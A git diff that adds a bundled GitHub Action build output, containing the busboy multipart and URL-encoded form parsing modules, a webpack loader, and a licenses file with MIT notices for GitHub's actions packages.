+ filename = parsed[i][1] + if (!preservePath) { filename = basename(filename) } + } + } + } else { return skipPart(part) } + + if (header['content-transfer-encoding']) { encoding = header['content-transfer-encoding'][0].toLowerCase() } else { encoding = '7bit' } + + let onData, + onEnd + + if (isPartAFile(fieldname, contype, filename)) { + // file/binary field + if (nfiles === filesLimit) { + if (!boy.hitFilesLimit) { + boy.hitFilesLimit = true + boy.emit('filesLimit') + } + return skipPart(part) + } + + ++nfiles + + if (!boy._events.file) { + self.parser._ignore() + return + } + + ++nends + const file = new 
FileStream(fileOpts) + curFile = file + file.on('end', function () { + --nends + self._pause = false + checkFinished() + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + }) + file._read = function (n) { + if (!self._pause) { return } + self._pause = false + if (self._cb && !self._needDrain) { + const cb = self._cb + self._cb = undefined + cb() + } + } + boy.emit('file', fieldname, file, filename, encoding, contype) + + onData = function (data) { + if ((nsize += data.length) > fileSizeLimit) { + const extralen = fileSizeLimit - nsize + data.length + if (extralen > 0) { file.push(data.slice(0, extralen)) } + file.truncated = true + file.bytesRead = fileSizeLimit + part.removeAllListeners('data') + file.emit('limit') + return + } else if (!file.push(data)) { self._pause = true } + + file.bytesRead = nsize + } + + onEnd = function () { + curFile = undefined + file.push(null) + } + } else { + // non-file field + if (nfields === fieldsLimit) { + if (!boy.hitFieldsLimit) { + boy.hitFieldsLimit = true + boy.emit('fieldsLimit') + } + return skipPart(part) + } + + ++nfields + ++nends + let buffer = '' + let truncated = false + curField = part + + onData = function (data) { + if ((nsize += data.length) > fieldSizeLimit) { + const extralen = (fieldSizeLimit - (nsize - data.length)) + buffer += data.toString('binary', 0, extralen) + truncated = true + part.removeAllListeners('data') + } else { buffer += data.toString('binary') } + } + + onEnd = function () { + curField = undefined + if (buffer.length) { buffer = decodeText(buffer, 'binary', charset) } + boy.emit('field', fieldname, buffer, false, truncated, encoding, contype) + --nends + checkFinished() + } + } + + /* As of node@2efe4ab761666 (v0.10.29+/v0.11.14+), busboy had become + broken. Streams2/streams3 is a huge black box of confusion, but + somehow overriding the sync state seems to fix things again (and still + seems to work for previous node versions). 
+ */ + part._readableState.sync = false + + part.on('data', onData) + part.on('end', onEnd) + }).on('error', function (err) { + if (curFile) { curFile.emit('error', err) } + }) + }).on('error', function (err) { + boy.emit('error', err) + }).on('finish', function () { + finished = true + checkFinished() + }) +} + +Multipart.prototype.write = function (chunk, cb) { + const r = this.parser.write(chunk) + if (r && !this._pause) { + cb() + } else { + this._needDrain = !r + this._cb = cb + } +} + +Multipart.prototype.end = function () { + const self = this + + if (self.parser.writable) { + self.parser.end() + } else if (!self._boy._done) { + process.nextTick(function () { + self._boy._done = true + self._boy.emit('finish') + }) + } +} + +function skipPart (part) { + part.resume() +} + +function FileStream (opts) { + Readable.call(this, opts) + + this.bytesRead = 0 + + this.truncated = false +} + +inherits(FileStream, Readable) + +FileStream.prototype._read = function (n) {} + +module.exports = Multipart + + +/***/ }), + +/***/ 8306: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const Decoder = __nccwpck_require__(7100) +const decodeText = __nccwpck_require__(4619) +const getLimit = __nccwpck_require__(1467) + +const RE_CHARSET = /^charset$/i + +UrlEncoded.detect = /^application\/x-www-form-urlencoded/i +function UrlEncoded (boy, cfg) { + const limits = cfg.limits + const parsedConType = cfg.parsedConType + this.boy = boy + + this.fieldSizeLimit = getLimit(limits, 'fieldSize', 1 * 1024 * 1024) + this.fieldNameSizeLimit = getLimit(limits, 'fieldNameSize', 100) + this.fieldsLimit = getLimit(limits, 'fields', Infinity) + + let charset + for (var i = 0, len = parsedConType.length; i < len; ++i) { // eslint-disable-line no-var + if (Array.isArray(parsedConType[i]) && + RE_CHARSET.test(parsedConType[i][0])) { + charset = parsedConType[i][1].toLowerCase() + break + } + } + + if (charset === undefined) { charset = cfg.defCharset || 
'utf8' } + + this.decoder = new Decoder() + this.charset = charset + this._fields = 0 + this._state = 'key' + this._checkingBytes = true + this._bytesKey = 0 + this._bytesVal = 0 + this._key = '' + this._val = '' + this._keyTrunc = false + this._valTrunc = false + this._hitLimit = false +} + +UrlEncoded.prototype.write = function (data, cb) { + if (this._fields === this.fieldsLimit) { + if (!this.boy.hitFieldsLimit) { + this.boy.hitFieldsLimit = true + this.boy.emit('fieldsLimit') + } + return cb() + } + + let idxeq; let idxamp; let i; let p = 0; const len = data.length + + while (p < len) { + if (this._state === 'key') { + idxeq = idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x3D/* = */) { + idxeq = i + break + } else if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesKey === this.fieldNameSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesKey } + } + + if (idxeq !== undefined) { + // key with assignment + if (idxeq > p) { this._key += this.decoder.write(data.toString('binary', p, idxeq)) } + this._state = 'val' + + this._hitLimit = false + this._checkingBytes = true + this._val = '' + this._bytesVal = 0 + this._valTrunc = false + this.decoder.reset() + + p = idxeq + 1 + } else if (idxamp !== undefined) { + // key with no assignment + ++this._fields + let key; const keyTrunc = this._keyTrunc + if (idxamp > p) { key = (this._key += this.decoder.write(data.toString('binary', p, idxamp))) } else { key = this._key } + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + if (key.length) { + this.boy.emit('field', decodeText(key, 'binary', this.charset), + '', + keyTrunc, + false) + } + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if 
there are encoded bytes... + if (i > p) { this._key += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._bytesKey = this._key.length) === this.fieldNameSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._keyTrunc = true + } + } else { + if (p < len) { this._key += this.decoder.write(data.toString('binary', p)) } + p = len + } + } else { + idxamp = undefined + for (i = p; i < len; ++i) { + if (!this._checkingBytes) { ++p } + if (data[i] === 0x26/* & */) { + idxamp = i + break + } + if (this._checkingBytes && this._bytesVal === this.fieldSizeLimit) { + this._hitLimit = true + break + } else if (this._checkingBytes) { ++this._bytesVal } + } + + if (idxamp !== undefined) { + ++this._fields + if (idxamp > p) { this._val += this.decoder.write(data.toString('binary', p, idxamp)) } + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + this._state = 'key' + + this._hitLimit = false + this._checkingBytes = true + this._key = '' + this._bytesKey = 0 + this._keyTrunc = false + this.decoder.reset() + + p = idxamp + 1 + if (this._fields === this.fieldsLimit) { return cb() } + } else if (this._hitLimit) { + // we may not have hit the actual limit if there are encoded bytes... 
+ if (i > p) { this._val += this.decoder.write(data.toString('binary', p, i)) } + p = i + if ((this._val === '' && this.fieldSizeLimit === 0) || + (this._bytesVal = this._val.length) === this.fieldSizeLimit) { + // yep, we actually did hit the limit + this._checkingBytes = false + this._valTrunc = true + } + } else { + if (p < len) { this._val += this.decoder.write(data.toString('binary', p)) } + p = len + } + } + } + cb() +} + +UrlEncoded.prototype.end = function () { + if (this.boy._done) { return } + + if (this._state === 'key' && this._key.length > 0) { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + '', + this._keyTrunc, + false) + } else if (this._state === 'val') { + this.boy.emit('field', decodeText(this._key, 'binary', this.charset), + decodeText(this._val, 'binary', this.charset), + this._keyTrunc, + this._valTrunc) + } + this.boy._done = true + this.boy.emit('finish') +} + +module.exports = UrlEncoded + + +/***/ }), + +/***/ 7100: +/***/ ((module) => { + +"use strict"; + + +const RE_PLUS = /\+/g + +const HEX = [ + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 0, + 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 +] + +function Decoder () { + this.buffer = undefined +} +Decoder.prototype.write = function (str) { + // Replace '+' with ' ' before decoding + str = str.replace(RE_PLUS, ' ') + let res = '' + let i = 0; let p = 0; const len = str.length + for (; i < len; ++i) { + if (this.buffer !== undefined) { + if (!HEX[str.charCodeAt(i)]) { + res += '%' + this.buffer + this.buffer = undefined + --i // retry character + } else { + this.buffer += str[i] + ++p + if (this.buffer.length === 2) { + res += String.fromCharCode(parseInt(this.buffer, 
16)) + this.buffer = undefined + } + } + } else if (str[i] === '%') { + if (i > p) { + res += str.substring(p, i) + p = i + } + this.buffer = '' + ++p + } + } + if (p < len && this.buffer === undefined) { res += str.substring(p) } + return res +} +Decoder.prototype.reset = function () { + this.buffer = undefined +} + +module.exports = Decoder + + +/***/ }), + +/***/ 8647: +/***/ ((module) => { + +"use strict"; + + +module.exports = function basename (path) { + if (typeof path !== 'string') { return '' } + for (var i = path.length - 1; i >= 0; --i) { // eslint-disable-line no-var + switch (path.charCodeAt(i)) { + case 0x2F: // '/' + case 0x5C: // '\' + path = path.slice(i + 1) + return (path === '..' || path === '.' ? '' : path) + } + } + return (path === '..' || path === '.' ? '' : path) +} + + +/***/ }), + +/***/ 4619: +/***/ (function(module) { + +"use strict"; + + +// Node has always utf-8 +const utf8Decoder = new TextDecoder('utf-8') +const textDecoders = new Map([ + ['utf-8', utf8Decoder], + ['utf8', utf8Decoder] +]) + +function getDecoder (charset) { + let lc + while (true) { + switch (charset) { + case 'utf-8': + case 'utf8': + return decoders.utf8 + case 'latin1': + case 'ascii': // TODO: Make these a separate, strict decoder? 
+ case 'us-ascii': + case 'iso-8859-1': + case 'iso8859-1': + case 'iso88591': + case 'iso_8859-1': + case 'windows-1252': + case 'iso_8859-1:1987': + case 'cp1252': + case 'x-cp1252': + return decoders.latin1 + case 'utf16le': + case 'utf-16le': + case 'ucs2': + case 'ucs-2': + return decoders.utf16le + case 'base64': + return decoders.base64 + default: + if (lc === undefined) { + lc = true + charset = charset.toLowerCase() + continue + } + return decoders.other.bind(charset) + } + } +} + +const decoders = { + utf8: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.utf8Slice(0, data.length) + }, + + latin1: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + return data + } + return data.latin1Slice(0, data.length) + }, + + utf16le: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.ucs2Slice(0, data.length) + }, + + base64: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + return data.base64Slice(0, data.length) + }, + + other: (data, sourceEncoding) => { + if (data.length === 0) { + return '' + } + if (typeof data === 'string') { + data = Buffer.from(data, sourceEncoding) + } + + if (textDecoders.has(this.toString())) { + try { + return textDecoders.get(this).decode(data) + } catch (e) { } + } + return typeof data === 'string' + ? 
data + : data.toString() + } +} + +function decodeText (text, sourceEncoding, destEncoding) { + if (text) { + return getDecoder(destEncoding)(text, sourceEncoding) + } + return text +} + +module.exports = decodeText + + +/***/ }), + +/***/ 1467: +/***/ ((module) => { + +"use strict"; + + +module.exports = function getLimit (limits, name, defaultLimit) { + if ( + !limits || + limits[name] === undefined || + limits[name] === null + ) { return defaultLimit } + + if ( + typeof limits[name] !== 'number' || + isNaN(limits[name]) + ) { throw new TypeError('Limit ' + name + ' is not a valid number') } + + return limits[name] +} + + +/***/ }), + +/***/ 1854: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; +/* eslint-disable object-property-newline */ + + +const decodeText = __nccwpck_require__(4619) + +const RE_ENCODED = /%[a-fA-F0-9][a-fA-F0-9]/g + +const EncodedLookup = { + '%00': '\x00', '%01': '\x01', '%02': '\x02', '%03': '\x03', '%04': '\x04', + '%05': '\x05', '%06': '\x06', '%07': '\x07', '%08': '\x08', '%09': '\x09', + '%0a': '\x0a', '%0A': '\x0a', '%0b': '\x0b', '%0B': '\x0b', '%0c': '\x0c', + '%0C': '\x0c', '%0d': '\x0d', '%0D': '\x0d', '%0e': '\x0e', '%0E': '\x0e', + '%0f': '\x0f', '%0F': '\x0f', '%10': '\x10', '%11': '\x11', '%12': '\x12', + '%13': '\x13', '%14': '\x14', '%15': '\x15', '%16': '\x16', '%17': '\x17', + '%18': '\x18', '%19': '\x19', '%1a': '\x1a', '%1A': '\x1a', '%1b': '\x1b', + '%1B': '\x1b', '%1c': '\x1c', '%1C': '\x1c', '%1d': '\x1d', '%1D': '\x1d', + '%1e': '\x1e', '%1E': '\x1e', '%1f': '\x1f', '%1F': '\x1f', '%20': '\x20', + '%21': '\x21', '%22': '\x22', '%23': '\x23', '%24': '\x24', '%25': '\x25', + '%26': '\x26', '%27': '\x27', '%28': '\x28', '%29': '\x29', '%2a': '\x2a', + '%2A': '\x2a', '%2b': '\x2b', '%2B': '\x2b', '%2c': '\x2c', '%2C': '\x2c', + '%2d': '\x2d', '%2D': '\x2d', '%2e': '\x2e', '%2E': '\x2e', '%2f': '\x2f', + '%2F': '\x2f', '%30': '\x30', '%31': '\x31', '%32': '\x32', '%33': '\x33', + 
'%34': '\x34', '%35': '\x35', '%36': '\x36', '%37': '\x37', '%38': '\x38', + '%39': '\x39', '%3a': '\x3a', '%3A': '\x3a', '%3b': '\x3b', '%3B': '\x3b', + '%3c': '\x3c', '%3C': '\x3c', '%3d': '\x3d', '%3D': '\x3d', '%3e': '\x3e', + '%3E': '\x3e', '%3f': '\x3f', '%3F': '\x3f', '%40': '\x40', '%41': '\x41', + '%42': '\x42', '%43': '\x43', '%44': '\x44', '%45': '\x45', '%46': '\x46', + '%47': '\x47', '%48': '\x48', '%49': '\x49', '%4a': '\x4a', '%4A': '\x4a', + '%4b': '\x4b', '%4B': '\x4b', '%4c': '\x4c', '%4C': '\x4c', '%4d': '\x4d', + '%4D': '\x4d', '%4e': '\x4e', '%4E': '\x4e', '%4f': '\x4f', '%4F': '\x4f', + '%50': '\x50', '%51': '\x51', '%52': '\x52', '%53': '\x53', '%54': '\x54', + '%55': '\x55', '%56': '\x56', '%57': '\x57', '%58': '\x58', '%59': '\x59', + '%5a': '\x5a', '%5A': '\x5a', '%5b': '\x5b', '%5B': '\x5b', '%5c': '\x5c', + '%5C': '\x5c', '%5d': '\x5d', '%5D': '\x5d', '%5e': '\x5e', '%5E': '\x5e', + '%5f': '\x5f', '%5F': '\x5f', '%60': '\x60', '%61': '\x61', '%62': '\x62', + '%63': '\x63', '%64': '\x64', '%65': '\x65', '%66': '\x66', '%67': '\x67', + '%68': '\x68', '%69': '\x69', '%6a': '\x6a', '%6A': '\x6a', '%6b': '\x6b', + '%6B': '\x6b', '%6c': '\x6c', '%6C': '\x6c', '%6d': '\x6d', '%6D': '\x6d', + '%6e': '\x6e', '%6E': '\x6e', '%6f': '\x6f', '%6F': '\x6f', '%70': '\x70', + '%71': '\x71', '%72': '\x72', '%73': '\x73', '%74': '\x74', '%75': '\x75', + '%76': '\x76', '%77': '\x77', '%78': '\x78', '%79': '\x79', '%7a': '\x7a', + '%7A': '\x7a', '%7b': '\x7b', '%7B': '\x7b', '%7c': '\x7c', '%7C': '\x7c', + '%7d': '\x7d', '%7D': '\x7d', '%7e': '\x7e', '%7E': '\x7e', '%7f': '\x7f', + '%7F': '\x7f', '%80': '\x80', '%81': '\x81', '%82': '\x82', '%83': '\x83', + '%84': '\x84', '%85': '\x85', '%86': '\x86', '%87': '\x87', '%88': '\x88', + '%89': '\x89', '%8a': '\x8a', '%8A': '\x8a', '%8b': '\x8b', '%8B': '\x8b', + '%8c': '\x8c', '%8C': '\x8c', '%8d': '\x8d', '%8D': '\x8d', '%8e': '\x8e', + '%8E': '\x8e', '%8f': '\x8f', '%8F': '\x8f', '%90': '\x90', '%91': '\x91', 
+ '%92': '\x92', '%93': '\x93', '%94': '\x94', '%95': '\x95', '%96': '\x96', + '%97': '\x97', '%98': '\x98', '%99': '\x99', '%9a': '\x9a', '%9A': '\x9a', + '%9b': '\x9b', '%9B': '\x9b', '%9c': '\x9c', '%9C': '\x9c', '%9d': '\x9d', + '%9D': '\x9d', '%9e': '\x9e', '%9E': '\x9e', '%9f': '\x9f', '%9F': '\x9f', + '%a0': '\xa0', '%A0': '\xa0', '%a1': '\xa1', '%A1': '\xa1', '%a2': '\xa2', + '%A2': '\xa2', '%a3': '\xa3', '%A3': '\xa3', '%a4': '\xa4', '%A4': '\xa4', + '%a5': '\xa5', '%A5': '\xa5', '%a6': '\xa6', '%A6': '\xa6', '%a7': '\xa7', + '%A7': '\xa7', '%a8': '\xa8', '%A8': '\xa8', '%a9': '\xa9', '%A9': '\xa9', + '%aa': '\xaa', '%Aa': '\xaa', '%aA': '\xaa', '%AA': '\xaa', '%ab': '\xab', + '%Ab': '\xab', '%aB': '\xab', '%AB': '\xab', '%ac': '\xac', '%Ac': '\xac', + '%aC': '\xac', '%AC': '\xac', '%ad': '\xad', '%Ad': '\xad', '%aD': '\xad', + '%AD': '\xad', '%ae': '\xae', '%Ae': '\xae', '%aE': '\xae', '%AE': '\xae', + '%af': '\xaf', '%Af': '\xaf', '%aF': '\xaf', '%AF': '\xaf', '%b0': '\xb0', + '%B0': '\xb0', '%b1': '\xb1', '%B1': '\xb1', '%b2': '\xb2', '%B2': '\xb2', + '%b3': '\xb3', '%B3': '\xb3', '%b4': '\xb4', '%B4': '\xb4', '%b5': '\xb5', + '%B5': '\xb5', '%b6': '\xb6', '%B6': '\xb6', '%b7': '\xb7', '%B7': '\xb7', + '%b8': '\xb8', '%B8': '\xb8', '%b9': '\xb9', '%B9': '\xb9', '%ba': '\xba', + '%Ba': '\xba', '%bA': '\xba', '%BA': '\xba', '%bb': '\xbb', '%Bb': '\xbb', + '%bB': '\xbb', '%BB': '\xbb', '%bc': '\xbc', '%Bc': '\xbc', '%bC': '\xbc', + '%BC': '\xbc', '%bd': '\xbd', '%Bd': '\xbd', '%bD': '\xbd', '%BD': '\xbd', + '%be': '\xbe', '%Be': '\xbe', '%bE': '\xbe', '%BE': '\xbe', '%bf': '\xbf', + '%Bf': '\xbf', '%bF': '\xbf', '%BF': '\xbf', '%c0': '\xc0', '%C0': '\xc0', + '%c1': '\xc1', '%C1': '\xc1', '%c2': '\xc2', '%C2': '\xc2', '%c3': '\xc3', + '%C3': '\xc3', '%c4': '\xc4', '%C4': '\xc4', '%c5': '\xc5', '%C5': '\xc5', + '%c6': '\xc6', '%C6': '\xc6', '%c7': '\xc7', '%C7': '\xc7', '%c8': '\xc8', + '%C8': '\xc8', '%c9': '\xc9', '%C9': '\xc9', '%ca': '\xca', '%Ca': 
'\xca', + '%cA': '\xca', '%CA': '\xca', '%cb': '\xcb', '%Cb': '\xcb', '%cB': '\xcb', + '%CB': '\xcb', '%cc': '\xcc', '%Cc': '\xcc', '%cC': '\xcc', '%CC': '\xcc', + '%cd': '\xcd', '%Cd': '\xcd', '%cD': '\xcd', '%CD': '\xcd', '%ce': '\xce', + '%Ce': '\xce', '%cE': '\xce', '%CE': '\xce', '%cf': '\xcf', '%Cf': '\xcf', + '%cF': '\xcf', '%CF': '\xcf', '%d0': '\xd0', '%D0': '\xd0', '%d1': '\xd1', + '%D1': '\xd1', '%d2': '\xd2', '%D2': '\xd2', '%d3': '\xd3', '%D3': '\xd3', + '%d4': '\xd4', '%D4': '\xd4', '%d5': '\xd5', '%D5': '\xd5', '%d6': '\xd6', + '%D6': '\xd6', '%d7': '\xd7', '%D7': '\xd7', '%d8': '\xd8', '%D8': '\xd8', + '%d9': '\xd9', '%D9': '\xd9', '%da': '\xda', '%Da': '\xda', '%dA': '\xda', + '%DA': '\xda', '%db': '\xdb', '%Db': '\xdb', '%dB': '\xdb', '%DB': '\xdb', + '%dc': '\xdc', '%Dc': '\xdc', '%dC': '\xdc', '%DC': '\xdc', '%dd': '\xdd', + '%Dd': '\xdd', '%dD': '\xdd', '%DD': '\xdd', '%de': '\xde', '%De': '\xde', + '%dE': '\xde', '%DE': '\xde', '%df': '\xdf', '%Df': '\xdf', '%dF': '\xdf', + '%DF': '\xdf', '%e0': '\xe0', '%E0': '\xe0', '%e1': '\xe1', '%E1': '\xe1', + '%e2': '\xe2', '%E2': '\xe2', '%e3': '\xe3', '%E3': '\xe3', '%e4': '\xe4', + '%E4': '\xe4', '%e5': '\xe5', '%E5': '\xe5', '%e6': '\xe6', '%E6': '\xe6', + '%e7': '\xe7', '%E7': '\xe7', '%e8': '\xe8', '%E8': '\xe8', '%e9': '\xe9', + '%E9': '\xe9', '%ea': '\xea', '%Ea': '\xea', '%eA': '\xea', '%EA': '\xea', + '%eb': '\xeb', '%Eb': '\xeb', '%eB': '\xeb', '%EB': '\xeb', '%ec': '\xec', + '%Ec': '\xec', '%eC': '\xec', '%EC': '\xec', '%ed': '\xed', '%Ed': '\xed', + '%eD': '\xed', '%ED': '\xed', '%ee': '\xee', '%Ee': '\xee', '%eE': '\xee', + '%EE': '\xee', '%ef': '\xef', '%Ef': '\xef', '%eF': '\xef', '%EF': '\xef', + '%f0': '\xf0', '%F0': '\xf0', '%f1': '\xf1', '%F1': '\xf1', '%f2': '\xf2', + '%F2': '\xf2', '%f3': '\xf3', '%F3': '\xf3', '%f4': '\xf4', '%F4': '\xf4', + '%f5': '\xf5', '%F5': '\xf5', '%f6': '\xf6', '%F6': '\xf6', '%f7': '\xf7', + '%F7': '\xf7', '%f8': '\xf8', '%F8': '\xf8', '%f9': '\xf9', 
'%F9': '\xf9', + '%fa': '\xfa', '%Fa': '\xfa', '%fA': '\xfa', '%FA': '\xfa', '%fb': '\xfb', + '%Fb': '\xfb', '%fB': '\xfb', '%FB': '\xfb', '%fc': '\xfc', '%Fc': '\xfc', + '%fC': '\xfc', '%FC': '\xfc', '%fd': '\xfd', '%Fd': '\xfd', '%fD': '\xfd', + '%FD': '\xfd', '%fe': '\xfe', '%Fe': '\xfe', '%fE': '\xfe', '%FE': '\xfe', + '%ff': '\xff', '%Ff': '\xff', '%fF': '\xff', '%FF': '\xff' +} + +function encodedReplacer (match) { + return EncodedLookup[match] +} + +const STATE_KEY = 0 +const STATE_VALUE = 1 +const STATE_CHARSET = 2 +const STATE_LANG = 3 + +function parseParams (str) { + const res = [] + let state = STATE_KEY + let charset = '' + let inquote = false + let escaping = false + let p = 0 + let tmp = '' + const len = str.length + + for (var i = 0; i < len; ++i) { // eslint-disable-line no-var + const char = str[i] + if (char === '\\' && inquote) { + if (escaping) { escaping = false } else { + escaping = true + continue + } + } else if (char === '"') { + if (!escaping) { + if (inquote) { + inquote = false + state = STATE_KEY + } else { inquote = true } + continue + } else { escaping = false } + } else { + if (escaping && inquote) { tmp += '\\' } + escaping = false + if ((state === STATE_CHARSET || state === STATE_LANG) && char === "'") { + if (state === STATE_CHARSET) { + state = STATE_LANG + charset = tmp.substring(1) + } else { state = STATE_VALUE } + tmp = '' + continue + } else if (state === STATE_KEY && + (char === '*' || char === '=') && + res.length) { + state = char === '*' + ? 
STATE_CHARSET + : STATE_VALUE + res[p] = [tmp, undefined] + tmp = '' + continue + } else if (!inquote && char === ';') { + state = STATE_KEY + if (charset) { + if (tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } + charset = '' + } else if (tmp.length) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + if (res[p] === undefined) { res[p] = tmp } else { res[p][1] = tmp } + tmp = '' + ++p + continue + } else if (!inquote && (char === ' ' || char === '\t')) { continue } + } + tmp += char + } + if (charset && tmp.length) { + tmp = decodeText(tmp.replace(RE_ENCODED, encodedReplacer), + 'binary', + charset) + } else if (tmp) { + tmp = decodeText(tmp, 'binary', 'utf8') + } + + if (res[p] === undefined) { + if (tmp) { res[p] = tmp } + } else { res[p][1] = tmp } + + return res +} + +module.exports = parseParams + + +/***/ }) + +/******/ }); +/************************************************************************/ +/******/ // The module cache +/******/ var __webpack_module_cache__ = {}; +/******/ +/******/ // The require function +/******/ function __nccwpck_require__(moduleId) { +/******/ // Check if module is in cache +/******/ var cachedModule = __webpack_module_cache__[moduleId]; +/******/ if (cachedModule !== undefined) { +/******/ return cachedModule.exports; +/******/ } +/******/ // Create a new module (and put it into the cache) +/******/ var module = __webpack_module_cache__[moduleId] = { +/******/ // no module.id needed +/******/ // no module.loaded needed +/******/ exports: {} +/******/ }; +/******/ +/******/ // Execute the module function +/******/ var threw = true; +/******/ try { +/******/ __webpack_modules__[moduleId].call(module.exports, module, module.exports, __nccwpck_require__); +/******/ threw = false; +/******/ } finally { +/******/ if(threw) delete __webpack_module_cache__[moduleId]; +/******/ } +/******/ +/******/ // Return the exports of the module +/******/ return module.exports; +/******/ } 
+/******/ +/************************************************************************/ +/******/ /* webpack/runtime/compat */ +/******/ +/******/ if (typeof __nccwpck_require__ !== 'undefined') __nccwpck_require__.ab = __dirname + "/"; +/******/ +/************************************************************************/ +/******/ +/******/ // startup +/******/ // Load entry module and return exports +/******/ // This entry module is referenced by other modules so it can't be inlined +/******/ var __webpack_exports__ = __nccwpck_require__(6144); +/******/ module.exports = __webpack_exports__; +/******/ +/******/ })() +; \ No newline at end of file diff --git a/.github/action/dist/licenses.txt b/.github/action/dist/licenses.txt new file mode 100644 index 00000000000..cd36a2d85ef --- /dev/null +++ b/.github/action/dist/licenses.txt 
@@ -0,0 +1,175 @@ +@actions/core +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/exec +MIT +The MIT License (MIT) + +Copyright 2019 GitHub + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. 
IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +@actions/http-client +MIT +Actions Http Client for Node.js + +Copyright (c) GitHub, Inc. + +All rights reserved. + +MIT License + +Permission is hereby granted, free of charge, to any person obtaining a copy of this software and +associated documentation files (the "Software"), to deal in the Software without restriction, +including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, +and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, +subject to the following conditions: + +The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT +LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN +NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, +WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. 
